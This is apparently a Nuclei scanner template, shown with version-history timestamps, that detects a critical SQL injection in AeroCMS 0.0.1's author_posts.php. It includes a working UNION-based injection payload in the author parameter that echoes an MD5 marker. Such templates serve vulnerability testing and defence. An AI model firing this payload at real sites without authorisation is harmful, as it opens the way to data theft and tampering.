2022-10-20 06:53:03 +00:00
id : aerocms-sqli
info :
2022-12-13 20:36:48 +00:00
name : AeroCMS 0.0.1 - SQL Injection
2022-10-20 06:53:03 +00:00
author : shivampand3y
2023-01-24 16:21:18 +00:00
severity : critical
2022-10-20 06:53:03 +00:00
description : |
2022-12-13 20:36:48 +00:00
AeroCMS 0.0.1 contains a SQL injection vulnerability via the author parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-10-20 06:53:03 +00:00
reference :
- https://www.exploit-db.com/exploits/51022
2022-10-20 07:15:34 +00:00
- https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
2022-12-13 20:36:48 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cwe-id : CWE-89
2022-10-20 06:53:03 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2022-10-20 06:53:03 +00:00
verified : true
2022-10-21 10:28:44 +00:00
tags : aero,cms,sqli,edb
2022-10-20 06:53:03 +00:00
variables :
num : "999999999"
2023-04-27 04:28:59 +00:00
http :
2022-10-20 06:53:03 +00:00
- method : GET
path :
- '{{BaseURL}}/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1'
2022-10-20 07:29:46 +00:00
- '{{BaseURL}}/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1'
2022-10-20 06:53:03 +00:00
2022-10-20 07:29:46 +00:00
stop-at-first-match : true
2022-10-20 06:53:03 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '{{md5(num)}}'
- type : status
status :
- 200